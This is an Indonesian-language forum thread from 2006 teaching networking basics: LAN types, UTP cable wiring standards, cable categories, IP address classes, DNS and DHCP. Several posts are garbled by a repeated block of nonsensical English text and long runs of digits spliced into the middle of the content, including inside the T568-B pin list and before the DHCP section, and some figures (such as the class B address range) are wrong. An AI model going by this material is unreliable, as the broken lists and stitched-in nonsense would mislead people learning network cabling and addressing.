ini thread makin sip klo disertai dengan gambarnya ..


misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...

acheh
View Public Profile
Send a private message to acheh
Find More Posts by acheh

12-18-2006, 09:24 AM #11


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe

@muiz
pc router dan masang UTP ya...
besok kita sambung ya...

@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..

sambung nyak....

kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN

seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).

Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.

Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.

Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh

secara garis besar, LAN itu didukung 2 komponen utama, yaitu:


1. Kompenen fisik seperti PC, NIC (Network Interface Card), kabel dan topologinya
2. Kompenen Software seperti sistem operasi, Network Adapter Driver dan protokol jaringan itu
sendiri

apaan sih tu lis?


mari kita bahas aja satu2..

PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut

NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..

kabel dan topologi jaringan


coba lihat aja postingan sebelumnya

NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.

sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...

1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.

Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.

Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.

2. Jaringan Peer To Peer


--------------------------
Bila ditinjau dari peran server di kedua tipe jaringan tersebut, maka server di jaringan tipe peer to
peer diistilahkan non-dedicated server, karena server tidak berperan sebagai server murni melainkan
sekaligus dapat berperan sebagai workstation. (lha?)

Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.

Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.

(capek euy, mending copy aja ya?)

nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..

("_")
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-18-2006, 07:28 PM #12


muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by acheh
ini thread makin sip klo disertai dengan gambarnya ..
misal kabel coaxial, nah gambar coaxialnya gmn .. gtu ...

yup..pake gambar lebih jelas..tambah rame n bergairah belajarnya.. makasi...

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-18-2006, 07:56 PM #13


muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

sep bang alis

muiz
View Public Profile
Send a private message to muiz
Find More Posts by muiz

12-20-2006, 11:33 AM #14


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

cara masang kabel UTP

--------------------------------------------------------------------------------
---------------------

jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:

1. Standard T568-A

Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat

2. Standard T568-B

Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
hurried step towards the table bedroom living room
6 hijo

in the house ahmadi iksan haris nuk wulan tito wanted


to take his glasses like a child
1000000000000000000000000000000000000000000
000000000000000000 forces continue to follow the
great iskandar farid wulan ahmadi extraordinary
spectacles to take children Darmo
10000000000000000000000000000000000000 darmi
troops followed them Hurip adenan Mulyani would
like to take glasses isang wanted to take his glasses to
take the plate with a colorful married servants who
worked as a cook clean sweep of the room with
colorful married anywhere agus married with colors
like to take glasses lilik want to take the glasses to
take glasses Nunus andi mas tito Theresa wanted to
take a child glasses follow
1000000000000000000000000000000000
extraordinary iskandar memngambil also wanted
glasses so in the closet to retrieve his glasses mufti of
children and law mufti who wanted to take the glasses
to a law that opened the closet darmi
100000000000000000000000000000000000 Darmo
children eat and drink with the following colors
7 putih dan coklat
8 coklat

2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:

Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.

Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai adalah
standard T568-B.

Crossover
===========
Merupakan jenis kabel yang digunakan untuk menghubungkan antar workstation atau antar
hub/switch. Kabel jenis ini menggunakan standard T568-A pada salah satu ujung, dan T568-B pada
ujung lainnya.

ini ada dikit cara masangnya:

1. Pembuatan kabel
a) Siapkan kabel UTP dan RJ 45 sebagai interfacenya
b) Potong jaket ujung kabel kira-kira 1.5 cm dengan cutter atau gunting,dan buanglah jaket tersebut.
Hati-hati dalam mengupas jaket, jangan sampai kabel yang ada di dalamnya ikut terpotong.
c) Untwist atau buka lilitan masing-masing pasangan kabel
d) Untuk membuat kabel straight-trough, crossover maupun rollover, lihat standard T568-A atau
T568-B
e) Sesuaikan masing-masing jenis kabel dengan standardnya, lalu luruskan hingga memungkinkan
untuk bisa dimasukkan ke dalam RJ 45
f) Bila sudah dimasukkan ke RJ 45, crimpinglah dengan menggunakan peralatan yang ada agar
kabel menjadi permanen dan tidak mudah goyah
g) Periksa terlebih dahulu urutan kabelnya sebelum dicrimping, karena kabel yang sudah
dicrimping tidak dapat dicabut lagi. Artinya jika kita salah mengurutkan pasangan atau
memasukkan ke RJ 45 nya kurang sempurna, besar kemungkinan kabel tidak dapat dipakai

2. Test kabel
a) Kabel yang sudah dicrimping dapat dideteksi kesalahannya dengan memakai cable tester (misal :
Fluke 620 LSN CableMeter)
b) Bila cable tester tidak ada, pasangkan kabel tersebut dari NIC ke hub (bila jenisnya straight-
through) dan antar workstation jika jenis kabelnya adalah crossover.
c) Pekailah perintah ping untuk uji coba kabel. Apabila koneksi dapat terbentuk, berarti pembuatan
kabel Anda sudah benar. Sebaliknya, jika koneksi tak dapat terbentuk, berarti ada kesalahan dalam
proses cabling.

semoga bermanfaat
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-20-2006, 11:37 AM #15


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts
--------------------------------------------------------------------------------

Protokol TCP/IP
===============
Karena penting peranannya pada sistem operasi Windows dan juga karena protokol TCP/IP
merupakan protokol pilihan (default) dari Windows. Protokol TCP berada pada lapisan Transport
model OSI (Open System Interconnection), sedangkan IP berada pada lapisan Network mode OSI

IP Address
----------
IP address adalah alamat yang diberikan pada jaringan komputer dan peralatan jaringan yang
menggunakan protokol TCP/IP. IP address terdiri atas 32 bit angka biner yang dapat dituliskan
sebagai empat kelompok angka desimal yang dipisahkan oleh tanda titik seperti 192.168.0.1.

+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+

IP address terdiri atas dua bagian yaitu network ID dan host ID, dimana network ID menentukan
alamat jaringan komputer, sedangkan host ID menentukan alamat host (komputer, router, switch).

Oleh sebab itu IP address memberikan alamat lengkap suatu host beserta alamat jaringan di mana
host itu berada.

Kelas-kelas IP Address
------------------------
Untuk mempermudah pemakaian, bergantung pada kebutuhan pemakai, IP address dibagi dalam
tiga kelas seperti diperlihatkan dibawah

------+------------+---------------+--------------------+
Kelas |Network ID Host ID | Default Subnet Mask|
------+-------------+---------------+--------------------+
A |xxx.0.0.1 |xxx.255.255.254| 255.0.0.0 |
B |xxx.xxx.0.1 |xxx.xxx.255.254| 255.255.0.0 |
C |xxx.xxx.xxx.1|xxx.xxx.xxx.254| 255.255.255.0 |
------+-------------+---------------+--------------------+

IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar.
Range IP 1.xxx.xxx.xxx. – 126.xxx.xxx.xxx, terdapat 16.777.214 (16 juta) IP address pada tiap
kelas A.
IP address kelas A diberikan untuk jaringan dengan jumlah host yang sangat besar. Pada IP address
kelas A, network ID ialah 8 bit pertama, sedangkan host ID ialah 24 bit berikutnya.
Dengan demikian, cara membaca IP address kelas A, misalnya 113.46.5.6 ialah:
Network ID = 113
Host ID = 46.5.6
Sehingga IP address diatas berarti host nomor 46.5.6 pada network nomor 113.

IP address kelas B biasanya dialokasikan untuk jaringan berukuran sedang dan besar. Pada IP
address kelas B, network ID ialah 16 bit pertama, sedangkan host ID ialah 16 bit berikutnya.
Dengan demikian, cara membaca IP address kelas B, misalnya 132.92.121.1
Network ID = 132.92
Host ID = 121.1
Sehingga IP address di atas berarti host nomor 121.1 pada network nomor 132.92. dengan panjang
host ID 16 bit, network dengan IP address kelas B dapat menampung sekitar 65000 host. Range IP
128.0.xxx.xxx – 191.155.xxx.xxx

IP address kelas C awalnya digunakan untuk jaringan berukuran kecil (LAN). Host ID ialah 8 bit
terakhir. Dengan konfigurasi ini, bisa dibentuk sekitar 2 juta network dengan masing-masing
network memiliki 256 IP address. Range IP 192.0.0.xxx – 223.255.255.x.
Pengalokasian IP address pada dasarnya ialah proses memilih network Id dan host ID yang tepat
untuk suatu jaringan. Tepat atau tidaknya konfigurasi ini tergantung dari tujuan yang hendak
dicapai, yaitu mengalokasikan IP address seefisien mungkin.

Domain Name System (DNS)


-------------------------
Domain Name System (DNS) adalah suatu sistem yang memungkinkan nama suatu host pada
jaringan komputer atau internet ditranslasikan menjadi IP address. Dalam pemberian nama, DNS
menggunakan arsitektur hierarki.

1. Root-level domain: merupakan tingkat teratas yang ditampilkan sebagai tanda titik (.).
2. Top level domain: kode kategori organisasi atau negara misalnya: .com untuk dipakai oleh
perusahaan; .edu untuk dipakai oleh perguruan tinggi; .gov untuk dipakai oleh badan pemerintahan.
Selain itu untuk membedakan pemakaian nama oleh suatu negara dengan
negara lain digunakan tanda misalnya .id untuk Indonesia atau .au untuk australia.
3. Second level domain: merupakan nama untuk organisasi atau perusahaan, misalnya:
microsoft.com; yahoo.com, dan lain-lain.

hurried step towards the


DHCP (Dynamic Host Configuration Protocol)

table bedroom living room in the house ahmadi iksan


haris nuk wulan tito wanted to take his glasses like a
child
1000000000000000000000000000000000000000000
000000000000000000 forces continue to follow the
great iskandar farid wulan ahmadi extraordinary
spectacles to take children Darmo
10000000000000000000000000000000000000 darmi
troops followed them Hurip adenan Mulyani would
like to take glasses isang wanted to take his glasses to
take the plate with a colorful married servants who
worked as a cook clean sweep of the room with
colorful married anywhere agus married with colors
like to take glasses lilik want to take the glasses to
take glasses Nunus andi mas tito Theresa wanted to
take a child glasses follow
1000000000000000000000000000000000
extraordinary iskandar memngambil also wanted
glasses so in the closet to retrieve his glasses mufti of
children and law mufti who wanted to take the glasses
to a law that opened the closet darmi
100000000000000000000000000000000000 Darmo
children eat and drink with the following colors
-------------------------------------------
IP address dan subnet mask dapat diberikan secara otomatis menggunakan Dynamic Host
Configuration Protocol atau disi secara manual.
DHCP berfungsi untuk memberikan IP address secara otomatis pada komputer yang menggunakan
protokol TCP/IP. DHCP bekerja dengan relasi client-server, dimana DHCP server menyediakan
suatu kelompok IP address yang dapat diberikan pada DHCP client. Dalam memberikan IP address
ini, DHCP hanya meminjamkan IP address tersebut. Jadi pemberian IP address ini berlangsung
secara dinamis.

Topologi Jaringan adalah gambaran secara fisik dari pola hubungan antara komponen-komponen
jaringan, yang meliputi server, workstation, hub dan pengkabelannnya. Terdapat tiga macam
topologi jaringan umum digunakan, yaitu Bus, Star dan Ring.
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-20-2006, 11:38 AM #16


jurnalis jh
Imum Mukim
Join Date: Nov 2006
Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

untuk wlan .....


apa ya yang dibutuhin?
kalo alis gak salah sih cuma butuh access point aja.
kalo mau dari laptop kan udah ada tuh wireless linknya, tinggal konfigurasi aja di laptopnya, kalo di
kompi biasa, beli dulu access pointnya untuk nangkap gelombangnya, untuk seterusnya,
sambungkan access point ke komputer dengan kabel LAN biasa...dari AP ke Kompi mesti pake
kabel, karena Kompi gak punya wirelesslink seperti laptop..itu yang alis tau...mungkin ada teman2
yang lebih tau..hhe
__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook

jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-22-2006, 07:43 PM #17


c4m4r2006
kawoem

Join Date: Apr 2006


Location: Jakarta
Posts: 166
Thanks: 0
Thanked 14 Times in 7 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
@acheh
ternyata repot ya buat nambahin gambar ke sini, jadi males juga euy..hhe

@muiz
pc router dan masang UTP ya...
besok kita sambung ya...

@Shinosuke
sip deh, tapi sebelum WLAN, kita bahas LANnya aja dulu ya..

sambung nyak....

kemarin kita udah ngebahas kabel ama topologinya, sekarang kita bakal bahas salah satu
implementasinya, yaitu LAN

seiring berkembangnya jaman ni, kita gak hanya mengenal LAN doang, tapi sekarang udah ada
WLAN, yaitu Wireless LAN, yaitu LAN tanpa kabel (simplenya gitu).

Local Area Network (LAN) adalah sejumlah komputer yang saling dihubungkan bersama di dalam
satu areal tertentu yang tidak begitu luas, seperti di dalam satu kantor atau gedung.

Secara komunikasinya, terdapat dua tipe jaringan atau LAN, yaitu jaringan Peer to Peer dan
jaringan Client-Server.

Pada jaringan peer to peer, setiap komputer yang terhubung ke jaringan dapat bertindak baik
sebagai workstation maupun server. Sedangkan pada jaringan Client-Server, hanya satu komputer
yang bertugas sebagai server dan komputer lain berperan sebagai workstation. Antara dua tipe
jaringan
tersebut masing-masing memiliki keunggulan dan kelemahan, ntar kita bakal bahas lebuh jauh

secara garis besar, LAN itu didukung 2 komponen utama, yaitu:


1. Kompenen fisik seperti PC, NIC (Network Interface Card), kabel dan topologinya
2. Kompenen Software seperti sistem operasi, Network Adapter Driver dan protokol jaringan itu
sendiri

apaan sih tu lis?


mari kita bahas aja satu2..

PC
walah, gak banget deh bahas masalah PC yang kita pake sekarang ini, tapi kita akan bahas PC yang
berfungsi di jaringan aja.
Tipe personal komputer yang digunakan di dalam jaringan akan sangat menentukan unjuk kerja dari
jaringan tersebut. Komputer dengan unjuk kerja tinggi akan mampu mengirim dan mengakses data
dalam jaringan dengan cepat.
Di dalam jaringan tipe Client-Server, komputer yang difungsikan sebagai server mutlak harus
memiliki unjuk kerja yang lebih tinggi dibandingkan komputer-komputer
lain sebagai workstation-nya, karena server akan bertugas menyediakan fasilitas dan
mengelola operasional jaringan tersebut

NIC
Berdasarkan tipe bus, ada beberapa tipe network interface card (nic) atau network card, yaitu ISA
dan PCI.
Saat ini terdapat jenis network card yang banyak digunakan, yaitu PCI
untuk lebih jelasnya, lihat aja LAN Card sodara-sodara..asal gak on board kayak punya alis, hhe..

kabel dan topologi jaringan


coba lihat aja postingan sebelumnya

NAD
bukan naggroe kita nih, tapi Network Adapter Card. Setiap network card akan memiliki driver atau
program yang berfungsi untuk mengaktifkan dan mengkonfigurasi network adapter tersebut
disesuaikan dengan lingkungan dimana network card tersebut dipasang agar dapat digunakan untuk
melakukan komunikasi data.

sistem operasi
OS disini bukan seperti Windows dan Linux, tapi OS peer to peer dan Client Server. kita bahas
satu2...

1. Jaringan Client-Server
-------------------------
Server adalah komputer yang menyediakan fasilitas bagi komputer-komputer lain didalam jaringan
dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.

hurried step towards the table bedroom living room in


the house ahmadi iksan haris nuk wulan tito wanted to
take his glasses like a child
1000000000000000000000000000000000000000000
000000000000000000 forces continue to follow the
great iskandar farid wulan ahmadi extraordinary
spectacles to take children Darmo
10000000000000000000000000000000000000 darmi
troops followed them Hurip adenan Mulyani would
like to take glasses isang wanted to take his glasses to
take the plate with a colorful married servants who
worked as a cook clean sweep of the room with
colorful married anywhere agus married with colors
like to take glasses lilik want to take the glasses to
take glasses Nunus andi mas tito Theresa wanted to
take a child glasses follow
1000000000000000000000000000000000
extraordinary iskandar memngambil also wanted
glasses so in the closet to retrieve his glasses mufti of
children and law mufti who wanted to take the glasses
to a law that opened the closet darmi
100000000000000000000000000000000000 Darmo
children eat and drink with the following colors

Sumbangkan terjemahan yang lebih baik


Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.

Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.

2. Jaringan Peer To Peer


--------------------------
Bila ditinjau dari peran server di kedua tipe jaringan tersebut, maka server di jaringan tipe peer to
peer diistilahkan non-dedicated server, karena server tidak berperan sebagai server murni melainkan
sekaligus dapat berperan sebagai workstation. (lha?)

Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.

Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.
(capek euy, mending copy aja ya?)

nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..

("_")

sesekali bikin workshop donk...........


__________________

"Tidak Ada Kekayaan Melebihi Akal"


"Tidak Ada Kemiskinan Melebihi Kebodohan"
"Tidak Ada Warisan Melebihi Budi Pekerti"
"Tidak Ada Penolong Melebihi Konsultasi"

Email :Muammarsubki@yahoo.com

Website : http://www.subki.orgfree.com

c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006

12-23-2006, 11:28 PM #18


jurnalis jh
Imum Mukim

Join Date: Nov 2006


Location: d/h AlisBandung
Posts: 2,246
Thanks: 3
Thanked 18 Times in 9 Posts

--------------------------------------------------------------------------------

wah workshop? alis di bandung nih


__________________
Kuasai Dunia dengan Informasi

My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh

12-27-2006, 02:50 PM #19


muiz
Peutua

Join Date: Dec 2006


Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts

--------------------------------------------------------------------------------

Quote:
Originally Posted by AlisBandung
---------------------

jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:

1. Standard T568-A

Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat

2. Standard T568-B

Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat
2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:

Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.

Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai

sekalian belajar nih tentang jaringan, dan biar topik ini gak sepi, mending alis nulis aja deh tentang
jaringan, kalo mau tanya, posting aja, kalo bisa dijawab syukur kalo gak bisa pasti ada teman lain
yang ngejawab

sebenarnya gak tau mulai dari mana nih ngomongnya, tapi karena thread ini dimulail dengan kabel,
kita bahs dikit tentang kabel ya..maap kalo membosankan bagi yang udah tau, kan lumayan, bagi-
bagi ilmu bagi yang belum tau

kabel
=====
bicara tentang jaringan, pasti gak lepas dari yang namanya kabel, walaupun sekarang udah
jamannya wireless, tapi kabel tetap akan menjadi bahan pelajaran yang gak mungkin dilupakan oleh
network equipment, toh wireless sekarang juga masih menganut ajaran (emang silat?) wired,
misalnya optik dll lah

prinsip kerjanya sih ringan, kabel ngubungin satu sisi dengan sisi yang lain dengan terminator di
masing2 ujung, tapi hubungan ini tidak menyebabkan hubungan tertutup antar 2 sisi saja, bisa di
setting menjadi 2 hubungan terbuka dengan sisi yang lain

sekarang kan jaman udah canggih, jadi topologi kabel juga berkembang, mulai dari jamannya
teknologi telegraf yang make gelombang radio hingga jamannya serat optik dan laser.

tipe-tipe kabel nih


===================
Setiap jenis kabel mempunyai kemampuan dan spesifikasinya yang berbeda, oleh karena itu
dibuatlah pengenalan tipe kabel.
Ada dua jenis kabel yang dikenal secara umum, yaitu:
1. twisted pair: UTP(unshielded twisted pair) dan STP (shielded twisted pair) 2. coaxial cable.

Kategori untuk twisted pair yaitu:

kabel:Type CAT 1
tipe :UTP
fitur:analog(biasanya digunakan di perangkat telephone pada umumnya dan pada jalur ISDN –
integrated service digital networks-. Juga untuk menghubungkan modem dengan line telepon).

kabel:Type CAT 2
tipe :UTP
fitur:up to 1 Mbits(sering digunakan pada topologi token ring)

kabel:Type CAT 3
tipe :UTP / STP
fitur:16 Mbits data transfer(sering digunakan pada topologi token ring atau
10BaseT)

kabel:Type CAT 4
tipe :UTP, STP
fitur:20 Mbits data transfer(biasanya digunakan pada topologi token ring)

kabel:Type CAT 5
tipe :UTP, STP
fitur:up to 100 MH. 100 Mbits data transfer / 22 db

kabel:Type CAT 5enhanced


tipe :UTP, STP
fitur:up to 100 MHz.1 Gigabit Ethernet up to 100 meters - 4 copper
pairs(kedua jenis CAT5 sering digunakan pada topologi token ring 16Mbps, Ethernet 10Mbps atau
pada FastEthernet 100Mbps)

kabel:Type CAT 6
tipe :UTP, STP
fitur:up to 155 MHz or 250 MHz. 2,5 Gigabit Ethernet up to 100 meters or 10
Gbit/s up to 25 meters . 20,2 db (Gigabit Ethernet)

kabel:Type CAT 7
tipe :UTP, STP
fitur:up to 200 MHz or 700 Mhz Giga-Ethernet / 20.8 db(Gigabit Ethernet)

ini tipe kabel, bukan untuk dihafal lho...alis juga ngambilnya dari:
http://www.glossary-tech.com/cable.htm dan http://www.firewall.cx/cabling_utp.php

Pemberian kategori 1/2/3/4/5/6 merupakan kategori spesifikasi untuk masing-masing kabel tembaga
dan juga untuk jack. Masing-masing merupakan seri revisi atas kualitas kabel, kualitas
pembungkusan kabel (isolator) dan juga untuk kualitas “belitan” (twist) masing-masing pasang
kabel. Selain itu juga untuk menentukan besaran frekuensi yang bisa lewat pada sarana kabel
tersebut, dan juga kualitas isolator sehingga bisa mengurangi efek induksi antar kabel (noise bisa
ditekan sedemikian rupa).------> fisika banget tuh

Perlu diingat juga (ingak..ingak), spesifikasi antara CAT5 dan CAT5 enchanced mempunyai standar
industri yang sama, namun pada CAT5e sudah dilengkapi dengan insulator untuk mengurangi efek
induksi atau electromagnetic interference. Kabel CAT5e bisa digunakan untuk menghubungkan
network hingga
kecepatan 1Gbps.(buset..1 giga bokkkkkk)

Sedangkan untuk coaxial cable, dikenal dua jenis, yaitu


1. thick coaxial cable (mempunyai diameter lumayan besar)
